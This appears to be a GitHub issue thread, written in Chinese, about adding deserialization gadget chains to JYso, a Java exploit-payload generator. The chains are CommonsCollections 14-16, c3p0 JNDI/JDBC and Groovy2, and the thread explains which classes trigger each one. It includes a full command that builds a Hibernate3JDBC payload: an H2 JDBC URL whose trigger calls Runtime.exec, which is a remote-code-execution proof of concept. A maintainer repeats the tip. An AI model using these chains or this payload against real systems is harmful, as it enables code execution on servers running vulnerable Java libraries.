Closed unam4 closed 2 months ago
加入 cc 14 15 16 c3p0jndi c3p0jndi2 c3p0JDBC groovy2 7条gadget
cc 14 15 16 分别用hashmap,hashtable、AnnotationInvocationHandler去触发TiedMapEntry的tosting
c3p0jndi c3p0jndi2 c3p0JDBC groovy2 都是使用fj去触发getter进行连接。可自行替换cb,rome,jackson触发
Hibernate3JDBC 与Hibernate1、Hibernate2 依赖冲突删除了,就用c3P0JDBC 干吧
java -jar JYso-1.3.2-all.jar -y -g Hibernate3JDBC -p "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS \$\$//javascript java.lang.Runtime.getRuntime().exec('open -a Calculator') \$\$" >>33
注意\转义
感谢
qi4L
commented
2 months ago qi4L
commented
2 months ago
tip
加入 cc 14 15 16 c3p0jndi c3p0jndi2 c3p0JDBC groovy2 7条gadget
cc 14 15 16 分别用hashmap,hashtable、AnnotationInvocationHandler去触发TiedMapEntry的tosting
c3p0jndi c3p0jndi2 c3p0JDBC groovy2 都是使用fj去触发getter进行连接。可自行替换cb,rome,jackson触发
Hibernate3JDBC 与Hibernate1、Hibernate2 依赖冲突删除了,就用c3P0JDBC 干吧
注意\转义